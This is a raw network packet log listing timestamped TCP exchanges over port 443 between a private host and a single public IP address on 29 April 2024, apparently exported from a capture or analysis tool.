Apr 29, 2024 22:13:26.327316046 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.327356100 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.327367067 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.327423096 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.429023981 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.429049015 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.429117918 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.429140091 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.429153919 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.429182053 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.576217890 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.576237917 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.576334000 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.576364040 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.576411009 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.677167892 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.677186012 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.677308083 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.677325010 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.677371979 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.754695892 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.754713058 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.754805088 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.754828930 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.754873037 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.811784983 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.811800957 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.811897993 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.811928034 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.811979055 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.856626034 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.856642962 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.856745958 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.856759071 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.856807947 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.898334980 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.898349047 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.898441076 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.898453951 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.898502111 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.940845013 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.940859079 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.940933943 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.940958023 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.941001892 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.985541105 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.985558033 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.985616922 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:26.985626936 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:26.985666990 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.024152994 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.024172068 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.024241924 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.024252892 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.024296045 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.050085068 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.050101042 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.050168037 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.050175905 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.050215960 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.075661898 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.075678110 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.075768948 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.075781107 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.075928926 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.097522974 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.097538948 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.097769976 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.097784042 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.097961903 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.121109009 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.121125937 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.121181011 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.121190071 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.121212006 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.121228933 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.140213013 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.140228987 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.140309095 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.140321970 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.140477896 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.161514044 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.161533117 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.161690950 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.161699057 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.161748886 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.177448034 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.177464962 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.177694082 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.177704096 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.177890062 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.195272923 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.195291042 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.195456028 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.195466995 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.195517063 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.212126970 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.212142944 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.212347984 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.212357998 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.212408066 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.225893021 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.225908995 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.225981951 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.225995064 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.226202965 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.243328094 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.243345976 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.243395090 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.243412971 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.243436098 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.243462086 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.256788969 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.256808043 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.256906033 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.256921053 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.257157087 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.272397995 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.272413969 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.272525072 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.272537947 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.272690058 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.286535025 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.286550999 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.286622047 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.286637068 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.286787033 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.298985958 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.299001932 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.299123049 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.299134016 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.299185038 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.313013077 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.313030958 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.313113928 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.313123941 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.313333988 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.313333988 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.324596882 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.324613094 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.324706078 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.324714899 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.324868917 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.336623907 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.336639881 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.336713076 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.336733103 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.336781979 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.347368956 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.347385883 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.347599030 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.347609043 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.347795963 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.359502077 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.359523058 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.359599113 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.359610081 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.359756947 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.369748116 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.369790077 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.369853020 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.369865894 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.369910955 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.379595041 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.379616022 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.379676104 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.379683971 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.379838943 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.388773918 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.388789892 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.388853073 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.388860941 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.388907909 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.399185896 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.399203062 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.399358988 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.399367094 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.399415970 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.408221960 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.408237934 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.408309937 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.408320904 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.408334017 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.408361912 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.416934013 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.416949034 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.417010069 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.417025089 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.417068005 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.426153898 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.426170111 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.426234007 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.426243067 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.426285028 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.436955929 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.436975956 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.437040091 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.437050104 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.437213898 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.442807913 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.442835093 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.442881107 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.442888021 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.442914009 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.442931890 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.449575901 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.449595928 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.449660063 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.449671984 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.449714899 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.457952976 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.457971096 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.458034992 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.458044052 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.458060980 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.458090067 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.464731932 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.464750051 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.464812994 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.464819908 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.464862108 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.472733021 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.472764969 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.472809076 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.472815990 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.472839117 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.472865105 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.480134010 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.480159998 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.480217934 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.480232000 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.480278969 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.486581087 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.486613989 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.486673117 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.486680031 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.486701012 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.486722946 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.497308969 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.497328997 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.497431040 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.497442961 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.497597933 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.503622055 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.503638983 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.503827095 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.503839016 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.503881931 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.509944916 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.509963989 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.510045052 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.510056973 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.510099888 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.515818119 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.515836000 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.515904903 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.515912056 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.515954018 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.522713900 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.522732019 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.522797108 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.522804022 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.522881985 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.528393030 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.528409958 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.528482914 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.528491020 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.528532982 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.534610987 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.534631014 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.534749031 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.534758091 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.534805059 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.541033030 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.541054010 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.541146994 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.541169882 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.541219950 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.546411991 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.546427965 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.546468973 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.546494961 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.546508074 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.546539068 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.551850080 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.551870108 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.551930904 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.551937103 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.551970959 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.551990032 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.557596922 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.557610035 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.557696104 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.557703018 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.557744980 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.564444065 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.564466000 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.564527988 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.564536095 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.564560890 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.564580917 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.569930077 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.569943905 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.569988012 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.570023060 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.570033073 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.570075035 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.575212002 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.575228930 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.575299978 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.575308084 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.575371027 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.580394983 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.580410957 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.580545902 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.580554008 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.580631018 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.585247993 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.585263968 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.585329056 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.585336924 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.585398912 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.589956999 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.589972973 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.590046883 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.590056896 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.590099096 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.595511913 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.595527887 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.595588923 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.595597982 CEST	443	49768	95.217.242.142	192.168.2.4
Apr 29, 2024 22:13:27.595673084 CEST	49768	443	192.168.2.4	95.217.242.142
Apr 29, 2024 22:13:27.600649118 CEST	443	49768	95.217.242.142	192.168.2.4
